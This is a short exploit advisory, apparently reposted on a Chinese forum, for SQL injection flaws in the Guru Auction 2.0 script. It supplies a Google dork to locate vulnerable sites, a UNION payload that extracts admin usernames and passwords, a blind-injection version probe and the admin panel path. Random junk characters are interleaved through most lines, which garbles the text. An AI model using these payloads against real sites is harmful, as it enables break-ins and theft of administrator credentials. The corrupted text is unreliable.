Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
+ M1 F1 e* `( l* Y0 W8 @. p2 n+ \/ q& i
作者 : v3n0m
* ^5 l: G8 O6 Z5 H# C应用 : Guru Auction 2.0
; Q3 G/ v2 H- SPrice : $49% @0 ?7 ~& d+ e* ^
Vendor : http://www.guruscript.com/
# z: p) _- d7 k* G) UGoogle Dork : inurl:subcat.php?cate_id=
3 l& U& a( u3 w2 ^% ` % \; c' @4 H) i% U( j
SQLi p0c:( w1 D& y; n: B. K! U7 F
~~~~~~~~~~& e1 I6 q" q5 C0 w3 ~7 T2 |; I
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--! j- T. B& N/ V3 n# R
' h; L/ W: D+ I6 ^! A. F
9 w+ ?! U" b$ P; y5 j$ R7 J盲注 p0c:( h5 V0 f# h0 o/ F- c% N
~~~~~~~~~~
5 D. U8 A. A9 ~; R- Mhttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
, V1 d4 d7 C$ B& y" T% chttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
4 L4 F, h5 _9 l- l
5 I' Z E1 a4 @# H) @' w7 T管理登录入口:
3 B! V, k# e" r~~~~~~~~~~
0 i! ]4 r/ ^1 T" ghttp://domain.tld/[path]/admin/
0 Q- B) B6 _/ A k |
发表于 2012-12-31 09:24:05
收藏
支持
反对